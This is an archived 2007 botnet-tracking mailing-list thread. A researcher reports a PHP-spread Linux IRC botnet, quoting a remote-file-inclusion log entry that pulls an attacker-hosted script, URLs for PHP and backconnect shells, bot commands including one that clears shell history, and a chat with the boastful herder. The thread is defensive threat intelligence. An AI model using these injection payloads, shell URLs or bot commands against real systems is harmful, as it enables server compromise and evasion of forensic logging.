To report a botnet PRIVATELY please email: [EMAIL PROTECTED] ---------- The increased bot count could be because of a New MSN or Trillian autospreader that I heard about. It could also be the result of an Apache 0day or ssh 0day that exists...
Lots of interesting things still... On 3/21/07 5:33 PM, "David Vorel" <[EMAIL PROTECTED]> wrote: > > I mean, that if you have good reason you can try ask anybody from > Shadowserver, but I hope it is very huge list !! > > http://www.shadowserver.org/wiki/pmwiki.php?n=Stats.BotCounts > > Btw: There is very fast increase state in zombie count for last two > weeks, 800k hosts !! > > > > On Wed, Mar 21, 2007 at 02:05:51PM -0400, Adriel T. Desautels wrote: >> List, >> I already have access to a list of C&C servers, but there is a list that >> I am missing. I'm very interested in getting a list of the IP addresses that >> the bots themselves are connecting from. Ie: What systems specifically did >> they infect? Is there a way to get such a list? >> >> >> On 3/21/07 2:03 PM, "David Vorel" <[EMAIL PROTECTED]> wrote: >> >>> To report a botnet PRIVATELY please email: [EMAIL PROTECTED] >>> ---------- >>> >>> Hi all, >>> >>> nice shot Bodik ;] I found different botnet on eu.undernet.org chan #vx8 >>> it's >>> linux >>> zombie based botnet spreads throught various bugs in PHP. Undernet >>> admins please take look on it. Description follows. Botnet herders are >>> Denzel, xeQt, aslpls-. >>> >>> >>> First attempt: >>> >>> 85.17.11.53 - - [20/Mar/2007:04:10:41 +0100] "GET >>> /index.php?loc=http://nawader.org/modules/Top/kgb.c? HTTP/1.1" 200 132 >>> "-" "libwww-perl/5.79" >>> >>> We mirror all links included, engine for RFI source is not completed >>> yet, so for this time I send row urls. >>> >>> http://nawader.org/modules/Top/kgb.c >>> http://www.honeynet.cz/bots/5249235d1476c24250130da98b9a34b5.txt >>> - PHP shell which includes other links >>> >>> http://nawader.org/modules/Top/bc.txt >>> http://www.honeynet.cz/bots/4456038f56e4b71b01ed0a348cbfeb41.txt >>> - Backconnect shell >>> >>> http://nawader.org/modules/Top/n.txt >>> http://www.honeynet.cz/bots/adc704f9697cdf89da9d503b11f9787d.txt >>> - Shellbot I, connect to eu.undernet.org #vx8 >>> >>> http://nawader.org/modules/Top/teamrx >>> http://www.honeynet.cz/bots/68f984e9f37e3911b92493cbb9b04aef.txt >>> - Loader for n.txt and bc.txt run backconnect and send shell to >>> 220.232.137.199 and 64.38.11.130 >>> >>> >>> http://nawader.org/modules/Top/toyo.txt >>> http://www.honeynet.cz/bots/80d97c973062d7d2d369f5f79578a597.txt >>> - Shellbot II, connect to eu.undernet.org #vx8 >>> >>> >>> >>> All scripts are labelled "xeQt vS TeaMrx". >>> >>> Who on chan: >>> >>> http://www.honeynet.cz/trash/list >>> >>> After while on channel bot herders move bots to another chan. >>> >>> #vx8 :<@xeQt> !x !join #perljunkies aV5&bvhyI >>> #vx8 :<@xeQt> !x !join #mp3fulls 209x5Vi. >>> >>> >>> >>> Here is list from uname -sr. >>> >>> http://www.honeynet.cz/trash/uname >>> >>> >>> >>> >>> chat: >>> >>> <crop> >>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :im no geek i tould >>>>> u >>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :im a criminal >>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :make shit >>> << PRIVMSG #vx8 :i now that you are criminal >>> << PRIVMSG #vx8 :but still on free ? >>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :nothings free >>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :$$ >>> << PRIVMSG xeQt :^AVERSION^A >>>>> :[EMAIL PROTECTED] NOTICE nirgil :^AVERSION mIRC >>>>> v6.17 Khaled Mardam-Bey^A >>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :its my life >>> << PRIVMSG #vx8 :jail is for free >>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :i know >>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :im going sooon >>> << PRIVMSG #vx8 :y are waiting for ? >>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :its full >>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :a few months >>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :im no murder, so i >>>>> goto wait >>> </crop> >>> >>> <crop> >>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :thats a trickey one >>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :cuz i dont touch >>>>> any of the servers >>> << PRIVMSG #vx8 :when u installed your script throught bug in php that's >>> touching too >>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 ::))) >>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :i tould you >>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :its magic >>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :i dont connect to >>>>> anything >>> << PRIVMSG #vx8 :yes u did >>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :no i didn't >>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :all the bots do my >>>>> job >>> << PRIVMSG #vx8 :and that is ? >>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :you know what mass >>>>> spread is? >>> << PRIVMSG #vx8 :<@xeQt> !x !join #perljunkies aV5&bvhyI >>> << PRIVMSG #vx8 :and what about this ? >>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :so? >>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :how you get this ip >>>>> address from that? >>> << PRIVMSG #vx8 :this command is better one.. >>> << PRIVMSG #vx8 :<@xeQt> !x uname -sr >>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :!x id >>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :uid=33949(nucsaor) >>>>> gid=33952(nucsaor) groups=33952(nucsaor) >>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :uid=33(www-data) >>>>> gid=33(www-data) groups=33(www-data) >>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :like that? >>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 >>>>> :uid=80(www) gid=80(www) groups=80(www) >>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :uid=80(www) >>>>> gid=80(www) groups=80(www) >>> << PRIVMSG #vx8 :yes, now you are in direct connect with these servers >>> .. >>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :i dont think you >>>>> have no clue man >>> << PRIVMSG #vx8 :thats the point of abuse .. >>> << PRIVMSG #vx8 :these servers are yours ? >>> << PRIVMSG #vx8 :or not ? >>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :i understand your >>>>> pissed off, but this is useless >>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :call the cops, make >>>>> them trace me... but its useless >>> << PRIVMSG #vx8 :I think that all servers here are used to fraud .. >>> << PRIVMSG #vx8 :i dont think so .. >>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :!x unset HISTFILE >>>>> HISTSAVE >>> << PRIVMSG #vx8 :heh >>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :o_0 >>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :i dont see how you >>>>> get ip from that >>> << PRIVMSG #vx8 :from what ? >>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :David Hac? >>> << PRIVMSG #vx8 :? >>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :David Hac >>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :man >>> << PRIVMSG #vx8 :what ? >>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :good luck hunting >>>>> me >>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :with feds >>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :its useless >>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :for sure >>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :but do it.. i dont >>>>> say no but.. goood luck >>> << PRIVMSG #vx8 :i'm not hunting you, thats work for authorities. >>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :yes >>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :goood >>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :i like a channelge >>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :challenge >>> << PRIVMSG #vx8 :so what for now ? >>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :i dont need to >>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :why wold i do that? >>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :im the bitch, you >>>>> the victum.. >>> << PRIVMSG #vx8 :i'm not victim .. >>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :you hunt me >>> << PRIVMSG #vx8 :others are victims .. >>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :your right >>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :you a cop? >>> << PRIVMSG #vx8 :yes >>> << PRIVMSG #vx8 :;] >>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :and? >>>>> :[EMAIL PROTECTED] NICK :CopKiller >>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :what you gonna do >>>>> about it? >>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :call your friends, >>>>> girlfriends.... >>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :cuz i dont give a >>>>> fuck >>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :here i kick cops >>> << PRIVMSG #vx8 :so kick me dude ;] >>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :dont need to >>> << PRIVMSG #vx8 :heh >>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :come here and ill >>>>> show you >>> << PRIVMSG #vx8 :i'm here >>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :in my hoood >>>>> :[EMAIL PROTECTED] PRIVMSG #vx8 :not mirc >>> </crop> >>> >>> Cheers.. >>> >>> David Vorel >>> >>> _______________________________________________ >>> To report a botnet PRIVATELY please email: [EMAIL PROTECTED] >>> All list and server information are public and available to law enforcement >>> upon request. >>> http://www.whitestar.linuxbox.org/mailman/listinfo/botnets >> >> -- >> >> Regards, >> Adriel T. Desautels >> Chief Technology Officer - Netragard, LLC >> Office: 617-934-0269 || Mobile : 857-636-8882 >> http://www.linkedin.com/pub/1/118/a45 >> http://www.netragard.com >> ------------------------- >> "We make IT secure." >> >> -- Regards, Adriel T. Desautels Chief Technology Officer - Netragard, LLC Office: 617-934-0269 || Mobile : 857-636-8882 http://www.linkedin.com/pub/1/118/a45 http://www.netragard.com ------------------------- "We make IT secure." _______________________________________________ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
